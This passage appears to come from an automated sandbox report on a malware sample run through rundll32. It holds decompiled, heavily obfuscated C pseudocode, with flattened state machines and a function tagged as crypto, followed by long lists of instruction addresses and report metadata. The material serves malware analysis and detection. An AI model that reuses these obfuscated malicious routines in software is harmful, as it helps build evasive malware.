										if(_t491 == 0x140b5383) {
											E1001F23C(_v1620, _t546, _v1700, _v1668, _v1588);
											_t547 =  &(_t547[3]);
											L10:
											_t491 = 0x10ed6b66;
											while(1) {
												L1:
												_t522 = 0x5c;
												goto L2;
											}
										} else {
											_t554 = _t491 - 0x1e06f250;
											if(_t491 != 0x1e06f250) {
												goto L24;
											} else {
												_push(0x10001020);
												_push(_v1672);
												_t479 = E1001BF25(_v1644, _v1636, _t554);
												E100173C0( &_v1560, _t554);
												E10003482(_v1572, _t554,  &_v1040,  &_v520, _v1652, _v1596,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t479, _v1768, _v1716, _v1660);
												E1001C5F7(_v1760, _v1628, _v1736, _v1708, _t479);
												_t543 = _v1576;
												_t547 =  &(_t547[0x11]);
												_t491 = 0x2d4cd3b;
												while(1) {
													L1:
													_t522 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L27:
							return _t543;
						}
						__eflags = _t491 - 0x2a58a6fb;
						if(_t491 == 0x2a58a6fb) {
							E1000620A(_v1732, _v1740, _v1748, _v1680, _t490, _t546);
							_t547 =  &(_t547[4]);
							_t491 = 0x140b5383;
							_t522 = 0x5c;
							goto L24;
						} else {
							__eflags = _t491 - 0x2f9aa500;
							if(_t491 == 0x2f9aa500) {
								_t473 = E1000DA66(_v1592, _t522, _v1688, _t491, _v1696);
								_t490 = _t473;
								_t547 =  &(_t547[3]);
								__eflags = _t473;
								if(__eflags != 0) {
									_t491 = 0x38e9bb98;
									goto L1;
								}
							} else {
								__eflags = _t491 - 0x38e9bb98;
								if(_t491 != 0x38e9bb98) {
									goto L24;
								} else {
									_t489 = E1000BE98(_v1704, _t522, _v1600, _v1756, _v1608, _v1712, _t490, _v1720, _v1616, _v1764, _t540, _v1724, _t491, _v1772, _t491, _t491, _v1624, _t491, _v1632, _v1692,  &_v520, _t540, _v1640, _v1648, _v1752, _v1568);
									_t546 = _t489;
									_t547 =  &(_t547[0x18]);
									__eflags = _t489;
									if(__eflags == 0) {
										goto L10;
									} else {
										_t491 = 0x2a58a6fb;
										_t543 = 1;
										_v1576 = 1;
										while(1) {
											L1:
											_t522 = 0x5c;
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t491 - 0x19ee210;
					} while (__eflags != 0);
					goto L27;
				}
			}















































































                                                                        0x1000f813
                                                                        0x1000f81d
                                                                        0x1000f82a
                                                                        0x1000f835
                                                                        0x1000f83a
                                                                        0x1000f845
                                                                        0x1000f850
                                                                        0x1000f858
                                                                        0x1000f863
                                                                        0x1000f86b
                                                                        0x1000f873
                                                                        0x1000f87b
                                                                        0x1000f883
                                                                        0x1000f888
                                                                        0x1000f890
                                                                        0x1000f898
                                                                        0x1000f8a0
                                                                        0x1000f8ab
                                                                        0x1000f8b6
                                                                        0x1000f8c1
                                                                        0x1000f8cc
                                                                        0x1000f8d7
                                                                        0x1000f8e2
                                                                        0x1000f8ed
                                                                        0x1000f8f5
                                                                        0x1000f900
                                                                        0x1000f90b
                                                                        0x1000f916
                                                                        0x1000f921
                                                                        0x1000f92f
                                                                        0x1000f934
                                                                        0x1000f93a
                                                                        0x1000f93f
                                                                        0x1000f941
                                                                        0x1000f949
                                                                        0x1000f951
                                                                        0x1000f95e
                                                                        0x1000f95f
                                                                        0x1000f966
                                                                        0x1000f96a
                                                                        0x1000f972
                                                                        0x1000f97d
                                                                        0x1000f988
                                                                        0x1000f993
                                                                        0x1000f9a7
                                                                        0x1000f9ae
                                                                        0x1000f9b9
                                                                        0x1000f9c4
                                                                        0x1000f9cf
                                                                        0x1000f9da
                                                                        0x1000f9e2
                                                                        0x1000f9ea
                                                                        0x1000f9ef
                                                                        0x1000f9f4
                                                                        0x1000f9fc
                                                                        0x1000fa04
                                                                        0x1000fa0c
                                                                        0x1000fa14
                                                                        0x1000fa1c
                                                                        0x1000fa27
                                                                        0x1000fa32
                                                                        0x1000fa3a
                                                                        0x1000fa45
                                                                        0x1000fa4d
                                                                        0x1000fa57
                                                                        0x1000fa5b
                                                                        0x1000fa63
                                                                        0x1000fa6b
                                                                        0x1000fa76
                                                                        0x1000fa83
                                                                        0x1000fa8e
                                                                        0x1000fa9c
                                                                        0x1000faa1
                                                                        0x1000faa7
                                                                        0x1000faaf
                                                                        0x1000fab7
                                                                        0x1000fabf
                                                                        0x1000facc
                                                                        0x1000facf
                                                                        0x1000fad3
                                                                        0x1000fadb
                                                                        0x1000fae3
                                                                        0x1000faeb
                                                                        0x1000faf3
                                                                        0x1000fafb
                                                                        0x1000fb03
                                                                        0x1000fb0b
                                                                        0x1000fb13
                                                                        0x1000fb1b
                                                                        0x1000fb23
                                                                        0x1000fb2b
                                                                        0x1000fb30
                                                                        0x1000fb35
                                                                        0x1000fb3d
                                                                        0x1000fb50
                                                                        0x1000fb57
                                                                        0x1000fb62
                                                                        0x1000fb6a
                                                                        0x1000fb7a
                                                                        0x1000fb7e
                                                                        0x1000fb86
                                                                        0x1000fb8e
                                                                        0x1000fba0
                                                                        0x1000fba3
                                                                        0x1000fbaa
                                                                        0x1000fbb5
                                                                        0x1000fbbd
                                                                        0x1000fbc5
                                                                        0x1000fbcd
                                                                        0x1000fbda
                                                                        0x1000fbde
                                                                        0x1000fbe6
                                                                        0x1000fbee
                                                                        0x1000fbf6
                                                                        0x1000fbfe
                                                                        0x1000fc06
                                                                        0x1000fc0e
                                                                        0x1000fc16
                                                                        0x1000fc1a
                                                                        0x1000fc22
                                                                        0x1000fc2a
                                                                        0x1000fc35
                                                                        0x1000fc3d
                                                                        0x1000fc48
                                                                        0x1000fc53
                                                                        0x1000fc5e
                                                                        0x1000fc69
                                                                        0x1000fc74
                                                                        0x1000fc7f
                                                                        0x1000fc8a
                                                                        0x1000fc92
                                                                        0x1000fc9c
                                                                        0x1000fca0
                                                                        0x1000fca8
                                                                        0x1000fcb2
                                                                        0x1000fcbd
                                                                        0x1000fcc8
                                                                        0x1000fcd3
                                                                        0x1000fce1
                                                                        0x1000fce6
                                                                        0x1000fcec
                                                                        0x1000fcf1
                                                                        0x1000fcf9
                                                                        0x1000fd01
                                                                        0x1000fd09
                                                                        0x1000fd11
                                                                        0x1000fd16
                                                                        0x1000fd1b
                                                                        0x1000fd23
                                                                        0x1000fd2b
                                                                        0x1000fd30
                                                                        0x1000fd3d
                                                                        0x1000fd40
                                                                        0x1000fd44
                                                                        0x1000fd4c
                                                                        0x1000fd54
                                                                        0x1000fd59
                                                                        0x1000fd61
                                                                        0x1000fd69
                                                                        0x1000fd74
                                                                        0x1000fd7f
                                                                        0x1000fd8a
                                                                        0x1000fd9a
                                                                        0x1000fd9e
                                                                        0x1000fda3
                                                                        0x1000fdab
                                                                        0x1000fdb3
                                                                        0x1000fdb8
                                                                        0x1000fdc0
                                                                        0x1000fdc8
                                                                        0x1000fdd3
                                                                        0x1000fdde
                                                                        0x1000fde9
                                                                        0x1000fdf4
                                                                        0x1000fdff
                                                                        0x1000fe0a
                                                                        0x1000fe15
                                                                        0x1000fe24
                                                                        0x1000fe29
                                                                        0x1000fe32
                                                                        0x1000fe3d
                                                                        0x1000fe48
                                                                        0x1000fe50
                                                                        0x1000fe58
                                                                        0x1000fe63
                                                                        0x1000fe6b
                                                                        0x1000fe74
                                                                        0x1000fe79
                                                                        0x1000fe7f
                                                                        0x1000fe87
                                                                        0x1000fe99
                                                                        0x1000fe9c
                                                                        0x1000fea3
                                                                        0x1000feae
                                                                        0x1000febb
                                                                        0x1000fec2
                                                                        0x1000fec9
                                                                        0x1000fed0
                                                                        0x1000fed4
                                                                        0x1000fedc
                                                                        0x1000fee4
                                                                        0x1000feef
                                                                        0x1000ff05
                                                                        0x1000ff0d
                                                                        0x1000ff12
                                                                        0x1000ff1a
                                                                        0x1000ff22
                                                                        0x1000ff2a
                                                                        0x1000ff35
                                                                        0x1000ff40
                                                                        0x1000ff4b
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x1000ff4e
                                                                        0x1000ff4e
                                                                        0x1000ff4e
                                                                        0x1000ff4e
                                                                        0x1000ff54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000ff5a
                                                                        0x10010093
                                                                        0x100100c4
                                                                        0x100100c9
                                                                        0x100100cc
                                                                        0x1000ff4b
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x00000000
                                                                        0x1000ff4d
                                                                        0x1000ff60
                                                                        0x1000ff66
                                                                        0x10010079
                                                                        0x10010081
                                                                        0x10010081
                                                                        0x10010084
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001007e
                                                                        0x1001007e
                                                                        0x1001007e
                                                                        0x10010086
                                                                        0x10010089
                                                                        0x00000000
                                                                        0x1000ff6c
                                                                        0x1000ff72
                                                                        0x10010207
                                                                        0x1000ff78
                                                                        0x1000ff7e
                                                                        0x10010061
                                                                        0x10010066
                                                                        0x10010069
                                                                        0x10010069
                                                                        0x1000ff4b
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x00000000
                                                                        0x1000ff4d
                                                                        0x1000ff84
                                                                        0x1000ff84
                                                                        0x1000ff8a
                                                                        0x00000000
                                                                        0x1000ff90
                                                                        0x1000ff90
                                                                        0x1000ff95
                                                                        0x1000ffa7
                                                                        0x1000ffb5
                                                                        0x10010014
                                                                        0x10010030
                                                                        0x10010035
                                                                        0x1001003c
                                                                        0x1001003f
                                                                        0x1000ff4b
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x00000000
                                                                        0x1000ff4d
                                                                        0x1000ff4b
                                                                        0x1000ff8a
                                                                        0x1000ff7e
                                                                        0x1000ff72
                                                                        0x1000ff66
                                                                        0x10010210
                                                                        0x1001021b
                                                                        0x1001021b
                                                                        0x100100d6
                                                                        0x100100dc
                                                                        0x100101ce
                                                                        0x100101d3
                                                                        0x100101d6
                                                                        0x100101dd
                                                                        0x00000000
                                                                        0x100100e2
                                                                        0x100100e2
                                                                        0x100100e8
                                                                        0x100101a4
                                                                        0x100101a9
                                                                        0x100101ab
                                                                        0x100101ae
                                                                        0x100101b0
                                                                        0x100101b2
                                                                        0x00000000
                                                                        0x100101b2
                                                                        0x100100ee
                                                                        0x100100ee
                                                                        0x100100f4
                                                                        0x00000000
                                                                        0x100100fa
                                                                        0x1001016e
                                                                        0x10010173
                                                                        0x10010175
                                                                        0x10010178
                                                                        0x1001017a
                                                                        0x00000000
                                                                        0x10010180
                                                                        0x10010182
                                                                        0x10010187
                                                                        0x10010188
                                                                        0x1000ff4b
                                                                        0x1000ff4b
                                                                        0x1000ff4d
                                                                        0x00000000
                                                                        0x1000ff4d
                                                                        0x1000ff4b
                                                                        0x1001017a
                                                                        0x100100f4
                                                                        0x100100e8
                                                                        0x00000000
                                                                        0x100101de
                                                                        0x100101de
                                                                        0x100101de
                                                                        0x00000000
                                                                        0x100101ea

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
                                                                        • API String ID: 0-1002547484
                                                                        • Opcode ID: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
                                                                        • Instruction ID: a10887d5309f37cbec44b9bf97499b1ae25e94bdc5a0cbde92779140dd3b492f
                                                                        • Opcode Fuzzy Hash: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
                                                                        • Instruction Fuzzy Hash: C832E1715083809FE3B8CF61C849A9BBBE1FBC5744F10891DE2DA96260D7B58949CF53
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10011259, Relevance: 19.2, Strings: 15, Instructions: 407COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E10011259(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _t456;
				signed int _t460;
				intOrPtr _t483;
				intOrPtr* _t486;
				void* _t490;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				void* _t543;
				intOrPtr* _t550;
				signed int* _t551;
				signed int* _t552;

				_t486 = __ecx;
				_t551 =  &_v328;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x789b9f;
				_v136 = 0;
				_v132 = 0;
				_v252 = 0x9c45;
				_v252 = _v252 >> 0xa;
				_v252 = _v252 + 0xdca;
				_v252 = _v252 ^ 0x000071fb;
				_v324 = 0x63fc;
				_v324 = _v324 | 0x88cdde90;
				_v324 = _v324 + 0x73bf;
				_v324 = _v324 + 0xfe3;
				_v324 = _v324 ^ 0x88cef902;
				_v292 = 0x54b2;
				_v292 = _v292 >> 0x10;
				_v292 = _v292 | 0xe7a4c23a;
				_v292 = _v292 ^ 0x9f79697b;
				_v292 = _v292 ^ 0x78ddcaec;
				_v192 = 0xd97d;
				_v192 = _v192 * 0x68;
				_t543 = 0x2ff3c5f1;
				_v192 = _v192 ^ 0x005860dd;
				_v276 = 0xcf22;
				_t533 = 0x30;
				_v276 = _v276 * 0x64;
				_v276 = _v276 * 0x23;
				_v276 = _v276 / _t533;
				_v276 = _v276 ^ 0x003aac15;
				_v200 = 0xe99;
				_v200 = _v200 * 0x77;
				_v200 = _v200 ^ 0x0006edd2;
				_v316 = 0x8b49;
				_v316 = _v316 << 5;
				_v316 = _v316 | 0x25c31d21;
				_v316 = _v316 * 0x76;
				_v316 = _v316 ^ 0x6f7b91fa;
				_v300 = 0x416c;
				_v300 = _v300 ^ 0x0db1fc9b;
				_v300 = _v300 | 0xf73ffbe5;
				_v300 = _v300 ^ 0xffbfa19e;
				_v232 = 0x7c56;
				_v232 = _v232 << 7;
				_v232 = _v232 | 0x65dc48c8;
				_v232 = _v232 ^ 0x65fe4a93;
				_v284 = 0xa4ad;
				_v284 = _v284 + 0x3b34;
				_v284 = _v284 | 0x46e5bf9e;
				_v284 = _v284 + 0xaed;
				_v284 = _v284 ^ 0x46e62dba;
				_v308 = 0x51a5;
				_v308 = _v308 + 0xffff7093;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0x4d44;
				_v308 = _v308 ^ 0xffe14d92;
				_v216 = 0x9cb5;
				_v216 = _v216 + 0xa1ba;
				_v216 = _v216 ^ 0x7c221f2f;
				_v216 = _v216 ^ 0x7c23012a;
				_v248 = 0xb7b7;
				_v248 = _v248 + 0xffff0c03;
				_v248 = _v248 ^ 0x49401faf;
				_v248 = _v248 ^ 0xb6bfcfdf;
				_v268 = 0xf946;
				_t534 = 0x23;
				_v268 = _v268 / _t534;
				_v268 = _v268 ^ 0x2bbfee68;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0xffa5a976;
				_v240 = 0x34aa;
				_v240 = _v240 ^ 0x898fa139;
				_t535 = 0x66;
				_v240 = _v240 * 0xf;
				_v240 = _v240 ^ 0x0f69dc7c;
				_v328 = 0xae94;
				_v328 = _v328 >> 0xd;
				_v328 = _v328 ^ 0x36fbf0c7;
				_v328 = _v328 | 0xa53cbb78;
				_v328 = _v328 ^ 0xb7ffdef1;
				_v208 = 0xbc8e;
				_v208 = _v208 + 0x75c8;
				_v208 = _v208 ^ 0x00011f72;
				_v160 = 0x504a;
				_v160 = _v160 ^ 0xbc1e1624;
				_v160 = _v160 ^ 0xbc1e3fa8;
				_v312 = 0xe1b9;
				_v312 = _v312 ^ 0x616bd030;
				_v312 = _v312 * 0x17;
				_v312 = _v312 << 3;
				_v312 = _v312 ^ 0x050b8b93;
				_v172 = 0x434;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x00007db4;
				_v320 = 0x7186;
				_v320 = _v320 / _t535;
				_v320 = _v320 ^ 0x70a7bdd0;
				_v320 = _v320 + 0xffffa3e3;
				_v320 = _v320 ^ 0x70a70491;
				_v224 = 0x741a;
				_v224 = _v224 << 0xd;
				_v224 = _v224 + 0xffff57ca;
				_v224 = _v224 ^ 0x0e82cf00;
				_v288 = 0xd06d;
				_v288 = _v288 | 0x7ffffd7f;
				_v288 = _v288 ^ 0x7fffa657;
				_v296 = 0x1ceb;
				_v296 = _v296 + 0x45c4;
				_v296 = _v296 << 0xc;
				_t536 = 0x1f;
				_v296 = _v296 * 0x49;
				_v296 = _v296 ^ 0xc23e624a;
				_v164 = 0xac99;
				_v164 = _v164 + 0xffff7636;
				_v164 = _v164 ^ 0x000007a2;
				_v304 = 0xffa9;
				_v304 = _v304 << 0x10;
				_v304 = _v304 / _t536;
				_t537 = 0x2f;
				_v304 = _v304 / _t537;
				_v304 = _v304 ^ 0x002cccb4;
				_v184 = 0x3467;
				_v184 = _v184 ^ 0xc277e171;
				_v184 = _v184 ^ 0xc277d8b3;
				_v176 = 0xda70;
				_v176 = _v176 + 0xffff1f30;
				_v176 = _v176 ^ 0xffffb27f;
				_v260 = 0xae02;
				_v260 = _v260 << 0xc;
				_v260 = _v260 * 0x50;
				_v260 = _v260 ^ 0x660a4938;
				_v256 = 0x63fd;
				_v256 = _v256 + 0x38f;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000034b4;
				_v280 = 0x1bf8;
				_v280 = _v280 | 0x50a879c7;
				_v280 = _v280 ^ 0xa62f7448;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xd0e1eb8a;
				_v244 = 0x35;
				_t538 = 0x63;
				_v244 = _v244 * 0x70;
				_v244 = _v244 << 4;
				_v244 = _v244 ^ 0x000178e8;
				_v156 = 0x4bd8;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 ^ 0x00000c69;
				_v272 = 0xcefd;
				_v272 = _v272 << 4;
				_v272 = _v272 * 0x45;
				_v272 = _v272 + 0xffffd708;
				_v272 = _v272 ^ 0x037c36fb;
				_v196 = 0x7f21;
				_v196 = _v196 * 0x5e;
				_v196 = _v196 ^ 0x002ea2e9;
				_v204 = 0xcb9f;
				_v204 = _v204 / _t538;
				_v204 = _v204 ^ 0x00000b3c;
				_v168 = 0x3be2;
				_v168 = _v168 + 0xffffc6dc;
				_v168 = _v168 ^ 0x000064f9;
				_v264 = 0xf83;
				_v264 = _v264 >> 0xa;
				_v264 = _v264 + 0xacf6;
				_t539 = 0x33;
				_v264 = _v264 / _t539;
				_v264 = _v264 ^ 0x00007950;
				_v236 = 0xe76d;
				_t540 = 0x54;
				_v236 = _v236 / _t540;
				_t541 = 0x1b;
				_v236 = _v236 * 0x11;
				_v236 = _v236 ^ 0x00002164;
				_v188 = 0xc970;
				_v188 = _v188 / _t541;
				_v188 = _v188 ^ 0x00007c4d;
				_v212 = 0xdba3;
				_v212 = _v212 ^ 0x3f6919ac;
				_v212 = _v212 ^ 0x3cbdc81e;
				_v212 = _v212 ^ 0x03d448c8;
				_v220 = 0x9876;
				_v220 = _v220 >> 5;
				_v220 = _v220 * 0x3f;
				_v220 = _v220 ^ 0x00015d8d;
				_v180 = 0xda76;
				_v180 = _v180 + 0xffffee50;
				_v180 = _v180 ^ 0x0000c932;
				_v228 = 0x4db6;
				_v228 = _v228 >> 0xf;
				_v228 = _v228 >> 0xc;
				_v228 = _v228 ^ 0x00001ce0;
				_t550 = _a4;
				_t542 = _v144;
				_t483 = _v144;
				while(_t543 != 0xe3f9543) {
					if(_t543 == 0x265bf3eb) {
						_t456 = E10015A17(_v276,  &_v152, _v200, _v316);
						_pop(_t490);
						_push(_v308);
						_t384 = (_t456 & 0x0000000f) + 4; // 0x4
						E10014047(_t384, _v300, _v232, _t490, _v284,  &_v152,  &_v128);
						 *((char*)(_t551 + (_t456 & 0x0000000f) + 0xf8)) = 0;
						_t460 = E10015A17(_v216,  &_v152, _v248, _v268);
						_t552 =  &(_t551[8]);
						_t547 = _t460 & 0x0000000f;
						_push(_v160);
						_t397 = _t547 + 4; // 0x4
						E10014047(_t397, _v240, _v328, _v216, _v208,  &_v152,  &_v64);
						_push(_v320);
						 *((char*)(_t552 + (_t460 & 0x0000000f) + 0x138)) = 0;
						_push(_v172);
						_t542 = _t542 + E1001E14D(_v224, __eflags, _v288, _v296,  &_v64, E10012164(0x10001534, _v312, __eflags), _v164, _v304, _v144,  &_v128, _v184, _t542);
						E1001C5F7(_v176, _v260, _v256, _v280, _t464);
						_t551 =  &(_t552[0x15]);
						_t543 = 0xe3f9543;
						L10:
						_t486 = _v148;
						continue;
					}
					if(_t543 == 0x2b2ac207) {
						_push(_t486);
						_t542 = E100157E8(_a4);
						 *_t550 = _t542;
						__eflags = _t542;
						if(__eflags == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t543 = 0x265bf3eb;
						_t483 = _a4 + _t542;
						goto L10;
					}
					if(_t543 == 0x2ff3c5f1) {
						_v152 = E10017B6B();
						_t543 = 0x30aa390f;
						goto L10;
					}
					if(_t543 == 0x30aa390f) {
						_t543 = 0x2b2ac207;
						_a4 =  *((intOrPtr*)(_t486 + 4)) + 0x1000;
						continue;
					}
					_t561 = _t543 - 0x3a71eb6b;
					if(_t543 != 0x3a71eb6b) {
						L15:
						__eflags = _t543 - 0x15497eaf;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(_v168);
					_push(_v204);
					E1000D901(_v236, _t561, E10012164(0x10001474, _v196, _t561), _t542, _t483 - _t542, _v144, _v188);
					E1001C5F7(_v212, _v220, _v180, _v228, _t478);
					return 1;
				}
				E10009970(_v244,  *_t486, _v156, _t542,  *((intOrPtr*)(_t486 + 4)), _v272);
				_t486 = _v148;
				_t551 =  &(_t551[4]);
				_t543 = 0x3a71eb6b;
				_t542 = _t542 +  *((intOrPtr*)(_t486 + 4));
				__eflags = _t542;
				goto L15;
			}










































































                                                                        0x10011259
                                                                        0x10011259
                                                                        0x10011263
                                                                        0x1001126a
                                                                        0x10011271
                                                                        0x1001127e
                                                                        0x10011285
                                                                        0x1001128c
                                                                        0x10011294
                                                                        0x10011299
                                                                        0x100112a1
                                                                        0x100112a9
                                                                        0x100112b1
                                                                        0x100112b9
                                                                        0x100112c1
                                                                        0x100112c9
                                                                        0x100112d1
                                                                        0x100112d9
                                                                        0x100112de
                                                                        0x100112e6
                                                                        0x100112ee
                                                                        0x100112f6
                                                                        0x10011309
                                                                        0x10011310
                                                                        0x10011315
                                                                        0x10011320
                                                                        0x10011331
                                                                        0x10011332
                                                                        0x1001133d
                                                                        0x10011347
                                                                        0x1001134b
                                                                        0x10011353
                                                                        0x10011366
                                                                        0x1001136d
                                                                        0x10011378
                                                                        0x10011380
                                                                        0x10011385
                                                                        0x10011392
                                                                        0x10011396
                                                                        0x1001139e
                                                                        0x100113a6
                                                                        0x100113ae
                                                                        0x100113b6
                                                                        0x100113be
                                                                        0x100113c6
                                                                        0x100113cb
                                                                        0x100113d3
                                                                        0x100113db
                                                                        0x100113e3
                                                                        0x100113eb
                                                                        0x100113f3
                                                                        0x100113fb
                                                                        0x10011403
                                                                        0x1001140b
                                                                        0x10011413
                                                                        0x10011418
                                                                        0x10011420
                                                                        0x10011428
                                                                        0x10011433
                                                                        0x1001143e
                                                                        0x10011449
                                                                        0x10011454
                                                                        0x1001145c
                                                                        0x10011464
                                                                        0x1001146c
                                                                        0x10011476
                                                                        0x10011482
                                                                        0x10011487
                                                                        0x1001148d
                                                                        0x10011495
                                                                        0x1001149a
                                                                        0x100114a2
                                                                        0x100114aa
                                                                        0x100114b7
                                                                        0x100114ba
                                                                        0x100114be
                                                                        0x100114c6
                                                                        0x100114ce
                                                                        0x100114d3
                                                                        0x100114db
                                                                        0x100114e3
                                                                        0x100114eb
                                                                        0x100114f6
                                                                        0x10011501
                                                                        0x1001150c
                                                                        0x10011517
                                                                        0x10011522
                                                                        0x1001152d
                                                                        0x10011535
                                                                        0x10011542
                                                                        0x10011546
                                                                        0x1001154b
                                                                        0x10011553
                                                                        0x1001155e
                                                                        0x10011566
                                                                        0x10011571
                                                                        0x10011581
                                                                        0x10011585
                                                                        0x1001158d
                                                                        0x10011595
                                                                        0x1001159d
                                                                        0x100115a5
                                                                        0x100115aa
                                                                        0x100115b2
                                                                        0x100115ba
                                                                        0x100115c2
                                                                        0x100115ca
                                                                        0x100115d2
                                                                        0x100115da
                                                                        0x100115e2
                                                                        0x100115ec
                                                                        0x100115ef
                                                                        0x100115f3
                                                                        0x100115fb
                                                                        0x10011606
                                                                        0x10011611
                                                                        0x1001161c
                                                                        0x10011624
                                                                        0x10011631
                                                                        0x10011639
                                                                        0x1001163c
                                                                        0x10011640
                                                                        0x10011648
                                                                        0x10011653
                                                                        0x1001165e
                                                                        0x10011669
                                                                        0x10011674
                                                                        0x1001167f
                                                                        0x1001168a
                                                                        0x10011692
                                                                        0x1001169c
                                                                        0x100116a2
                                                                        0x100116aa
                                                                        0x100116b2
                                                                        0x100116ba
                                                                        0x100116bf
                                                                        0x100116c7
                                                                        0x100116cf
                                                                        0x100116d7
                                                                        0x100116df
                                                                        0x100116e4
                                                                        0x100116ec
                                                                        0x100116fb
                                                                        0x100116fe
                                                                        0x10011702
                                                                        0x10011707
                                                                        0x1001170f
                                                                        0x1001171a
                                                                        0x10011722
                                                                        0x1001172d
                                                                        0x10011735
                                                                        0x1001173f
                                                                        0x10011743
                                                                        0x1001174b
                                                                        0x10011753
                                                                        0x10011766
                                                                        0x1001176d
                                                                        0x10011778
                                                                        0x1001178e
                                                                        0x10011795
                                                                        0x100117a0
                                                                        0x100117ab
                                                                        0x100117b6
                                                                        0x100117c1
                                                                        0x100117c9
                                                                        0x100117ce
                                                                        0x100117da
                                                                        0x100117df
                                                                        0x100117e5
                                                                        0x100117ed
                                                                        0x100117f9
                                                                        0x100117fe
                                                                        0x10011809
                                                                        0x1001180a
                                                                        0x1001180e
                                                                        0x10011816
                                                                        0x1001182a
                                                                        0x10011831
                                                                        0x1001183c
                                                                        0x10011847
                                                                        0x10011852
                                                                        0x1001185d
                                                                        0x10011868
                                                                        0x10011870
                                                                        0x1001187a
                                                                        0x1001187e
                                                                        0x10011886
                                                                        0x10011891
                                                                        0x1001189c
                                                                        0x100118a7
                                                                        0x100118af
                                                                        0x100118b4
                                                                        0x100118b9
                                                                        0x100118c1
                                                                        0x100118c8
                                                                        0x100118cf
                                                                        0x100118d6
                                                                        0x100118e8
                                                                        0x10011a06
                                                                        0x10011a0c
                                                                        0x10011a0d
                                                                        0x10011a36
                                                                        0x10011a39
                                                                        0x10011a49
                                                                        0x10011a5c
                                                                        0x10011a61
                                                                        0x10011a6d
                                                                        0x10011a70
                                                                        0x10011a93
                                                                        0x10011a96
                                                                        0x10011a9b
                                                                        0x10011aa4
                                                                        0x10011aac
                                                                        0x10011b04
                                                                        0x10011b1a
                                                                        0x10011b1f
                                                                        0x10011b22
                                                                        0x100119b6
                                                                        0x100119b6
                                                                        0x00000000
                                                                        0x100119b6
                                                                        0x100118f4
                                                                        0x100119cd
                                                                        0x100119d6
                                                                        0x100119d8
                                                                        0x100119dc
                                                                        0x100119de
                                                                        0x10011b64
                                                                        0x10011b64
                                                                        0x00000000
                                                                        0x10011b64
                                                                        0x100119e7
                                                                        0x100119ec
                                                                        0x00000000
                                                                        0x100119ec
                                                                        0x10011900
                                                                        0x100119aa
                                                                        0x100119b1
                                                                        0x00000000
                                                                        0x100119b1
                                                                        0x1001190c
                                                                        0x1001198b
                                                                        0x10011995
                                                                        0x00000000
                                                                        0x10011995
                                                                        0x1001190e
                                                                        0x10011914
                                                                        0x10011b58
                                                                        0x10011b58
                                                                        0x10011b5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10011b5e
                                                                        0x1001191a
                                                                        0x10011926
                                                                        0x10011956
                                                                        0x10011978
                                                                        0x00000000
                                                                        0x10011982
                                                                        0x10011b41
                                                                        0x10011b46
                                                                        0x10011b4d
                                                                        0x10011b50
                                                                        0x10011b55
                                                                        0x10011b55
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
